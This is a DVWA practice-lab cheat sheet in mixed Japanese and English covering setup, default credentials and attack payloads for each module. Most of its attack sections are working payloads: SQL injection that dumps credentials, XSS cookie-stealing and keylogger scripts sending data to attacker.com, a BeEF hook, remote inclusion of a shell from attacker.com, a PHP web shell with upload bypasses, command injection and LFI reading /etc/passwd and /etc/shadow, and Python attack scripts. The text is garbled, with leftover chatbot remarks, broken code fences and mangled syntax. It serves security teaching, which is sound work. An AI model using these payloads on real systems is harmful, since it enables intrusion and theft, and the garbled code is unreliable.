DVWA (Damn Vulnerable Web Application) チートシート
概要
Damn Vulnerable Web Application (DVWA) は、セキュリティ専門家、学生、愛好家が法的かつ管理された環境でウェブアプリケーションセキュリティテストを実践するために意図的に脆弱に設計されたウェブアプリケーションです。Ryan Dewhurst によって開発され、DVWAチームによって維持されているこのPHP/MySQLウェブアプリケーションは、ウェブアプリケーションで一般的に見られる実世界のセキュリティ欠陥を反映する多数の意図的な脆弱性を含んでいます。DVWAは、ユーザーがウェブアプリケーションの脆弱性がどのように機能し、どのように悪用され、そして最も重要なことに、どのように防止できるかを理解するための教育プラットフォームとして機能します。
アプリケーションはOWASP Top 10の脆弱性を中心に構成されており、ウェブアプリケーションセキュリティの問題の幅広いスペクトルをカバーする追加のセキュリティ課題が含まれています。DVWAの各脆弱性は、Low、Medium、Highの複数の難易度レベルで実装されており、ユーザーが段階的にスキルと理解を発展させることができます。Lowレベルは通常、最小限または全く セキュリティ制御がなく、Mediumレベルは基本的な保護を実装していますが、バイパス可能であり、Highレベルは高度な技術を必要とするより堅牢なセキュリティ対策を含んでいます。
DVWAの教育的価値は単純な脆弱性の悪用を超えています。アプリケーションにはソースコード表示機能が含まれており、ユーザーは脆弱なコードを調査し、セキュリティ問題の根本原因を理解できます。この機能は、脆弱な実装と安全な実装の両方の例を見ることで、安全なコーディング手法を学びたい開発者にとって特に価値があります。アプリケーションは各脆弱性に対するヒントとガイダンスも提供しており、初心者にとってアクセスしやすく、経験豊富な実践者にとってもチャレンジングです。
このプラットフォームは、個人の自己学習から教室での指導、セキュリティトレーニングプログラムまで、さまざまな学習アプローチをサポートしています。モジュラーデザインにより、インストラクターは特定の脆弱性タイプに焦点を当てたり、包括的なセキュリティ評価演習を作成したりできます。DVWAは、世界中の大学、トレーニング組織、セキュリティ専門家によって、実践的なウェブアプリケーションセキュリティスキルを開発するための標準的なツールとなっています。
Would you like me to continue with the remaining sections?```bash
Pull DVWA Docker image
docker pull vulnerables/web-dvwa
Run DVWA container
docker run —rm -it -p 80:80 vulnerables/web-dvwa
Run with persistent data
docker run -d -p 80:80 —name dvwa vulnerables/web-dvwa
Access DVWA
Navigate to http://localhost in your browser
Default credentials: admin/password
Stop container
docker stop dvwa
Remove container
docker rm dvwa
Run with custom port
docker run -d -p 8080:80 —name dvwa vulnerables/web-dvwa
### Docker Compose Installation
```yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
dvwa:
image: vulnerables/web-dvwa
container_name: dvwa
ports:
- "80:80"
environment:
- MYSQL_ROOT_PASSWORD=dvwa
- MYSQL_DATABASE=dvwa
- MYSQL_USER=dvwa
- MYSQL_PASSWORD=p@ssw0rd
volumes:
- dvwa_data:/var/lib/mysql
restart: unless-stopped
volumes:
dvwa_data:
EOF
# Start DVWA
docker-compose up -d
# View logs
docker-compose logs -f
# Stop DVWA
docker-compose down
# Stop and remove volumes
docker-compose down -vManual Installation on Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install LAMP stack
sudo apt install apache2 mysql-server php php-mysql php-gd libapache2-mod-php -y
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql
# Secure MySQL installation
sudo mysql_secure_installation
# Create database and user
sudo mysql -u root -p ``<< 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
# Set permissions
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo chmod -R 755 /var/www/html/dvwa
# Configure DVWA
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Edit configuration
sudo nano /var/www/html/dvwa/config/config.inc.php
# Update database settings:
# $_DVWA['db_user'] = 'dvwa';
# $_DVWA['db_password'] = 'p@ssw0rd';
# $_DVWA['db_database'] = 'dvwa';
# Configure PHP
sudo nano /etc/php/*/apache2/php.ini
# Set: allow_url_include = On
# Set: allow_url_fopen = On
# Restart Apache
sudo systemctl restart apache2
# Access DVWA at http://localhost/dvwaInstallation on CentOS/RHEL
# Install EPEL repository
sudo yum install epel-release -y
# Install LAMP stack
sudo yum install httpd mariadb-server php php-mysql php-gd -y
# Start services
sudo systemctl start httpd
sudo systemctl start mariadb
sudo systemctl enable httpd
sudo systemctl enable mariadb
# Secure MariaDB
sudo mysql_secure_installation
# Create database
sudo mysql -u root -p << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF
# Download and configure DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
sudo chown -R apache:apache /var/www/html/dvwa
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
# Configure SELinux (if enabled)
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_unified 1
# Configure firewall
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --reload
# Restart Apache
sudo systemctl restart httpdWindows Installation (XAMPP)
# Download and install XAMPP
# https://www.apachefriends.org/download.html
# Start XAMPP Control Panel
# Start Apache and MySQL services
# Download DVWA
# Extract to C:\xampp\htdocs\dvwa
# Configure database
# Open phpMyAdmin (http://localhost/phpmyadmin)
# Create database 'dvwa'
# Create user 'dvwa' with password 'p@ssw0rd'
# Configure DVWA
# Copy config.inc.php.dist to config.inc.php
# Edit database settings in config.inc.php
# Access DVWA at http://localhost/dvwaInitial Setup and Configuration
First-Time Setup
# Access DVWA setup page
# Navigate to http://localhost/dvwa/setup.php
# Check system requirements
# Ensure all requirements are met (green checkmarks)
# Create/Reset Database
# Click "Create / Reset Database" button
# Login to DVWA
# Navigate to http://localhost/dvwa/login.php
# Username: admin
# Password: password
# Change default password (recommended)
# Go to DVWA Security ->`` Change PasswordSecurity Level Configuration
# Set security level
# Navigate to DVWA Security
# Low Security Level
# - Minimal security controls
# - Basic vulnerabilities easily exploitable
# - Ideal for beginners
# Medium Security Level
# - Some security controls implemented
# - Requires intermediate techniques
# - Good for skill development
# High Security Level
# - Robust security measures
# - Advanced exploitation techniques required
# - Challenging for experienced users
# Impossible Security Level
# - Secure implementation
# - Shows how vulnerabilities should be fixed
# - Educational reference for developersUser Management
# Default users in DVWA:
# admin:password (Administrator)
# gordonb:abc123 (User)
# 1337:charley (User)
# pablo:letmein (User)
# smithy:password (User)
# Add new users (via database)
mysql -u dvwa -p dvwa << 'EOF'
INSERT INTO users (user_id, first_name, last_name, user, password, avatar, last_login, failed_login)
VALUES (6, 'Test', 'User', 'testuser', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'http://localhost/dvwa/hackable/users/testuser.jpg', '0000-00-00 00:00:00', 0);
EOF
# Password hash for 'password': 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8Vulnerability Modules
SQL Injection
# Low Security Level
# Basic SQL injection
' OR '1'='1
' OR 1=1 --
' OR 1=1 #
# Extract database information
' UNION SELECT null, version() #
' UNION SELECT null, database() #
' UNION SELECT null, user() #
# Extract table names
' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() #
# Extract column names
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' #
# Extract user data
' UNION SELECT user, password FROM users #
# Medium Security Level
# Bypass basic filtering
1' OR '1'='1
1' OR 1=1 --
1' UNION SELECT null, version() --
# High Security Level
# Use advanced techniques
1' OR '1'='1' LIMIT 1 --
1' UNION SELECT null, CONCAT(user,':',password) FROM users LIMIT 1 --SQL Injection (Blind)
# Boolean-based blind SQL injection
# Low Security Level
1' AND 1=1 # (True condition)
1' AND 1=2 # (False condition)
# Extract database name length
1' AND LENGTH(database())=4 #
# Extract database name character by character
1' AND SUBSTRING(database(),1,1)='d' #
1' AND SUBSTRING(database(),2,1)='v' #
1' AND SUBSTRING(database(),3,1)='w' #
1' AND SUBSTRING(database(),4,1)='a' #
# Time-based blind SQL injection
1' AND SLEEP(5) #
1' AND IF(LENGTH(database())=4,SLEEP(5),0) #
# Extract user count
1' AND (SELECT COUNT(*) FROM users)=5 #
# Extract admin password length
1' AND LENGTH((SELECT password FROM users WHERE user='admin'))=32 #Cross-Site Scripting (XSS)
# Reflected XSS
# Low Security Level
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Medium Security Level
# Bypass basic filtering
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
# High Security Level
# Advanced bypass techniques
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg><script>alert('XSS')</script></svg>
# Cookie stealing payload
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
# Keylogger payload
<script>
document.onkeypress = function(e) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/log.php?key=' + String.fromCharCode(e.which), true);
xhr.send();
\\\\}
</script>Cross-Site Scripting (Stored)
# Stored XSS in message/comment fields
# Low Security Level
<script>alert('Stored XSS')</script>
<img src=x onerror=alert('Stored XSS')>
# Persistent cookie stealing
<script>
var img = new Image();
img.src = 'http://attacker.com/steal.php?cookie=' + document.cookie;
</script>
# Admin session hijacking
<script>
if(document.cookie.indexOf('admin') !== -1) \\\\{
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/admin.php?session=' + document.cookie, true);
xhr.send();
\\\\}
</script>
# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>
# Medium/High Security Level
# Use encoding and obfuscation
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">Cross-Site Request Forgery (CSRF)
<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
<input type="submit" value="Click me!">
</form>
<form id="csrf" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">
<input type="hidden" name="Change" value="Change">
</form>
<script>document.getElementById('csrf').submit();</script>
<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=hacked123&password_conf=hacked123&Change=Change">
<iframe src="data:text/html,<form action='http://localhost/dvwa/vulnerabilities/csrf/' method='GET'><input name='password_new' value='hacked123'><input name='password_conf' value='hacked123'><input name='Change' value='Change'></form><script>document.forms[0].submit()</script>"></iframe>File Inclusion
# Local File Inclusion (LFI)
# Low Security Level
page=../../../etc/passwd
page=../../../etc/shadow
page=../../../var/log/apache2/access.log
page=../../../proc/version
page=../../../home/user/.bash_history
# Windows LFI
page=../../../windows/system32/drivers/etc/hosts
page=../../../windows/win.ini
page=../../../windows/system.ini
# PHP wrapper exploitation
page=php://filter/convert.base64-encode/resource=../../../etc/passwd
page=php://filter/read=string.rot13/resource=../../../etc/passwd
# Log poisoning
# First, poison the log file via User-Agent
# Then include the log file
page=../../../var/log/apache2/access.log
# Medium Security Level
# Bypass basic filtering
page=....//....//....//etc/passwd
page=..././..././..././etc/passwd
# High Security Level
# Use null byte injection (older PHP versions)
page=../../../etc/passwd%00
page=../../../etc/passwd%00.php
# Remote File Inclusion (RFI)
# If allow_url_include is enabled
page=http://attacker.com/shell.txt
page=ftp://attacker.com/shell.txtFile Upload
# Low Security Level
# Upload PHP shell directly
<?php system($_GET['cmd']); ?>
# Save as shell.php and upload
# Medium Security Level
# Bypass MIME type filtering
# Change Content-Type to image/jpeg
# Or use double extension: shell.php.jpg
# Bypass file extension filtering
shell.php
shell.php5
shell.phtml
shell.phar
# High Security Level
# Embed PHP in image
# Create valid image with embedded PHP
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename to image.php
# GIF header bypass
GIF89a
<?php system($_GET['cmd']); ?>
# PNG bypass with PHP
# Create PNG with PHP payload in metadataCommand Injection
# Low Security Level
# Basic command injection
127.0.0.1; ls
127.0.0.1 && whoami
127.0.0.1|cat /etc/passwd
127.0.0.1 & id
# Windows command injection
127.0.0.1 & dir
127.0.0.1 && type C:\windows\win.ini
127.0.0.1|net user
# Medium Security Level
# Bypass basic filtering
127.0.0.1;ls
127.0.0.1&&whoami
127.0.0.1|cat$\\\\{IFS\\\\}/etc/passwd
# High Security Level
# Advanced bypass techniques
127.0.0.1|cat</etc/passwd
127.0.0.1|cat<>/etc/passwd
127.0.0.1|\\\\{cat,/etc/passwd\\\\}Weak Session IDs
# Analyze session ID patterns
# Low Security Level
# Session IDs increment sequentially
# Predict next session ID
# Medium Security Level
# Session IDs based on timestamp
# Calculate based on time
# High Security Level
# Session IDs use MD5 of timestamp
# Still predictable with time knowledge
# Session hijacking techniques
# Capture session cookies
# Use browser developer tools
# Intercept with Burp Suite
# Session fixation attacksInsecure CAPTCHA
# Low Security Level
# CAPTCHA validation bypass
# Remove step parameter
# Modify passed parameter
# Medium Security Level
# Bypass CAPTCHA validation
# Reuse passed parameter
# Manipulate form data
# High Security Level
# Advanced CAPTCHA bypass
# Analyze CAPTCHA generation
# Exploit implementation flaws
# Automated bypass techniques
# Use OCR tools
# Machine learning approaches
# Pattern recognitionTesting Methodologies
Manual Testing Approach
# 1. Reconnaissance
# - Examine source code
# - Identify input fields
# - Analyze client-side validation
# - Check for hidden parameters
# 2. Input Validation Testing
# - Test all input fields
# - Try various payloads
# - Check for filtering mechanisms
# - Test boundary conditions
# 3. Authentication Testing
# - Test login mechanisms
# - Check session management
# - Test password policies
# - Verify logout functionality
# 4. Authorization Testing
# - Test access controls
# - Check privilege escalation
# - Verify user roles
# - Test direct object references
# 5. Session Management Testing
# - Analyze session tokens
# - Test session fixation
# - Check session timeout
# - Verify secure flags
```### 自動テストツール
```bash
# SQLmap for SQL injection
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=your_session_id; security=low" --dbs
# Nikto web scanner
nikto -h http://localhost/dvwa/
# OWASP ZAP
# Configure proxy settings
# Spider the application
# Run active scan
# Burp Suite
# Configure browser proxy
# Intercept requests
# Use scanner and intruder
# w3af web application scanner
w3af_console
target http://localhost/dvwa/
plugins
audit sql_injection,xss,csrf
crawl web_spider
start
```### カスタムテストスクリプト
```python
#!/usr/bin/env python3
# DVWA SQL injection tester
import requests
import sys
def test_sql_injection(base_url, session_cookie):
payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' OR 1=1 #",
"' UNION SELECT null, version() #",
"' UNION SELECT user, password FROM users #"
]
headers = \\\\{
'Cookie': f'PHPSESSID=\\\\{session_cookie\\\\}; security=low'
\\\\}
for payload in payloads:
url = f"\\\\{base_url\\\\}/vulnerabilities/sqli/?id=\\\\{payload\\\\}&Submit=Submit"
try:
response = requests.get(url, headers=headers)
if 'admin' in response.text or 'root' in response.text:
print(f"[+] Successful payload: \\\\{payload\\\\}")
print(f"[+] Response contains sensitive data")
else:
print(f"[-] Failed payload: \\\\{payload\\\\}")
except Exception as e:
print(f"[!] Error with payload \\\\{payload\\\\}: \\\\{e\\\\}")
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 dvwa_sqli_test.py <base_url> <session_cookie>")
sys.exit(1)
base_url = sys.argv[1]
session_cookie = sys.argv[2]
test_sql_injection(base_url, session_cookie)
```## 教育的演習
### 初心者向け演習
```bash
# Exercise 1: Basic SQL Injection
# Objective: Extract all usernames and passwords
# Steps:
# 1. Set security level to Low
# 2. Navigate to SQL Injection module
# 3. Try basic payloads
# 4. Extract database information
# 5. Dump user credentials
# Exercise 2: Reflected XSS
# Objective: Execute JavaScript in victim's browser
# Steps:
# 1. Find XSS vulnerable parameter
# 2. Craft XSS payload
# 3. Test different bypass techniques
# 4. Create cookie stealing payload
# Exercise 3: File Upload Bypass
# Objective: Upload and execute PHP shell
# Steps:
# 1. Create PHP shell
# 2. Try direct upload
# 3. Bypass file type restrictions
# 4. Execute commands through shell
```### 中級者向け演習
```bash
# Exercise 4: Blind SQL Injection
# Objective: Extract data without direct output
# Steps:
# 1. Identify blind injection point
# 2. Use boolean-based techniques
# 3. Extract database name
# 4. Extract user passwords
# 5. Automate extraction process
# Exercise 5: CSRF Attack Chain
# Objective: Change admin password via CSRF
# Steps:
# 1. Analyze password change functionality
# 2. Create CSRF proof of concept
# 3. Test different delivery methods
# 4. Bypass CSRF protections
# Exercise 6: LFI to RCE
# Objective: Achieve code execution via LFI
# Steps:
# 1. Find LFI vulnerability
# 2. Test file inclusion
# 3. Poison log files
# 4. Achieve remote code execution
```### 上級者向け演習
```bash
# Exercise 7: Multi-Stage Attack
# Objective: Combine multiple vulnerabilities
# Steps:
# 1. Use XSS to steal admin session
# 2. Use CSRF to change admin password
# 3. Login as admin
# 4. Upload shell via file upload
# 5. Achieve system access
# Exercise 8: Session Prediction
# Objective: Predict and hijack sessions
# Steps:
# 1. Analyze session ID generation
# 2. Identify patterns
# 3. Predict valid session IDs
# 4. Hijack user sessions
# Exercise 9: Complete Compromise
# Objective: Full application takeover
# Steps:
# 1. Enumerate all vulnerabilities
# 2. Chain exploits together
# 3. Escalate privileges
# 4. Maintain persistence
# 5. Document attack path
```## セキュリティツールとの統合
### Burp Suiteとの統合
```bash
# Configure Burp Suite proxy
# Browser settings: 127.0.0.1:8080
# Burp Suite testing workflow
# 1. Spider DVWA application
# 2. Review site map
# 3. Send requests to Repeater
# 4. Test with Intruder
# 5. Run active scanner
# Custom Burp extensions for DVWA
# - DVWA Security Level Changer
# - Automated payload generator
# - Custom session handling
```### OWASP ZAPとの統合
```bash
# ZAP automated scan
zap-baseline.py -t http://localhost/dvwa/
# ZAP full scan
zap-full-scan.py -t http://localhost/dvwa/
# ZAP API usage
# Start ZAP daemon
zap.sh -daemon -port 8080
# Spider application
curl "http://localhost:8080/JSON/spider/action/scan/?url=http://localhost/dvwa/"
# Active scan
curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://localhost/dvwa/"
# Generate report
curl "http://localhost:8080/OTHER/core/other/htmlreport/" > dvwa_report.html
```### カスタムセキュリティスキャナー
```python
#!/usr/bin/env python3
# DVWA comprehensive scanner
import requests
import re
import time
from urllib.parse import urljoin
class DVWAScanner:
def __init__(self, base_url, session_cookie):
self.base_url = base_url
self.session = requests.Session()
self.session.cookies.set('PHPSESSID', session_cookie)
self.session.cookies.set('security', 'low')
def test_sql_injection(self):
print("[*] Testing SQL Injection...")
url = urljoin(self.base_url, '/vulnerabilities/sqli/')
payloads = [
"' OR '1'='1",
"' UNION SELECT user, password FROM users #"
]
for payload in payloads:
params = \\\\{'id': payload, 'Submit': 'Submit'\\\\}
response = self.session.get(url, params=params)
if 'admin' in response.text:
print(f"[+] SQL Injection successful: \\\\{payload\\\\}")
return True
print("[-] SQL Injection not found")
return False
def test_xss(self):
print("[*] Testing XSS...")
url = urljoin(self.base_url, '/vulnerabilities/xss_r/')
payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>"
]
for payload in payloads:
params = \\\\{'name': payload\\\\}
response = self.session.get(url, params=params)
if payload in response.text:
print(f"[+] XSS successful: \\\\{payload\\\\}")
return True
print("[-] XSS not found")
return False
def test_file_inclusion(self):
print("[*] Testing File Inclusion...")
url = urljoin(self.base_url, '/vulnerabilities/fi/')
payloads = [
"../../../etc/passwd",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
for payload in payloads:
params = \\\\{'page': payload\\\\}
response = self.session.get(url, params=params)
if 'root:' in response.text or 'cm9vdDo' in response.text:
print(f"[+] File Inclusion successful: \\\\{payload\\\\}")
return True
print("[-] File Inclusion not found")
return False
def run_scan(self):
print(f"[*] Starting DVWA scan on \\\\{self.base_url\\\\}")
results = \\\\{
'sql_injection': self.test_sql_injection(),
'xss': self.test_xss(),
'file_inclusion': self.test_file_inclusion()
\\\\}
print("\n[*] Scan Results:")
for vuln, found in results.items():
status = "VULNERABLE" if found else "NOT FOUND"
print(f" \\\\{vuln\\\\}: \\\\{status\\\\}")
return results
if __name__ == "__main__":
scanner = DVWAScanner("http://localhost/dvwa", "your_session_id")
scanner.run_scan()
```## 学習のためのベストプラクティス
### 段階的学習パス
```bash
# Phase 1: Understanding Basics (Low Security)
# - Learn how vulnerabilities work
# - Practice basic exploitation
# - Understand attack vectors
# - Review source code
# Phase 2: Bypass Techniques (Medium Security)
# - Learn common protections
# - Practice bypass methods
# - Understand filtering mechanisms
# - Develop advanced payloads
# Phase 3: Advanced Exploitation (High Security)
# - Master complex techniques
# - Chain multiple vulnerabilities
# - Develop custom exploits
# - Understand defense mechanisms
# Phase 4: Secure Development (Impossible Security)
# - Study secure implementations
# - Learn defensive coding
# - Understand security controls
# - Apply lessons to real applications
```### ドキュメンテーションとレポート
```bash
# Create learning journal
mkdir ~/dvwa_learning
cd ~/dvwa_learning
# Document each vulnerability
cat << 'EOF' > sql_injection_notes.md
# SQL Injection Learning Notes
## Low Security Level
- Vulnerability: Direct SQL injection in id parameter
- Payload: ' OR '1'='1
- Result: Bypassed authentication
- Root Cause: No input validation
## Medium Security Level
- Protection: Basic filtering of quotes
- Bypass: Using numeric injection
- Payload: 1 OR 1=1
- Lesson: Client-side filtering insufficient
## High Security Level
- Protection: Prepared statements
- Result: Injection prevented
- Lesson: Proper parameterization prevents SQLi
EOF
# Create exploit database
cat << 'EOF' > exploits.txt
# DVWA Exploit Database
## SQL Injection
' OR '1'='1
' UNION SELECT user, password FROM users #
## XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
## File Inclusion
../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
EOF
```### 安全なテスト環境
```bash
# Isolated network setup
# Use VirtualBox/VMware
# Create isolated network segment
# No internet access for vulnerable systems
# Backup and restore
# Create VM snapshots before testing
# Document system state
# Reset between exercises
# Monitoring and logging
# Enable web server logs
# Monitor system activity
# Document all actions
# Review logs for learning
```---
**⚠️ セキュリティ注意**: DVWA(Damn Vulnerable Web Application)は意図的に脆弱であり、教育目的のみで隔離された管理された環境でのみ使用する必要があります。本番ネットワークやインターネットからアクセス可能なシステムにDVWAを展開しないでください。このアプリケーションには、公開された場合にシステムセキュリティを危険にさらす深刻なセキュリティ脆弱性が含まれています。常に仮想マシンや隔離されたラボ環境でDVWAを使用してください。このツールは、Webアプリケーションセキュリティを学ぶために設計されており、セキュリティ専門家、学生、研究者によって責任を持って使用されるべきです。
**📚 追加リソース**:
- [DVWA公式GitHubリポジトリ](https://github.com/digininja/DVWA)
- [DVWA ドキュメンテーション](https://dvwa.co.uk/)
- [OWASP トップ10](https://owasp.org/www-project-top-ten/)
- [Webアプリケーションセキュリティテストガイド](https://owasp.org/www-project-web-security-testing-guide/)
Note: For entries 13-16, I left the placeholder brackets as they were, since no specific text was provided to translate.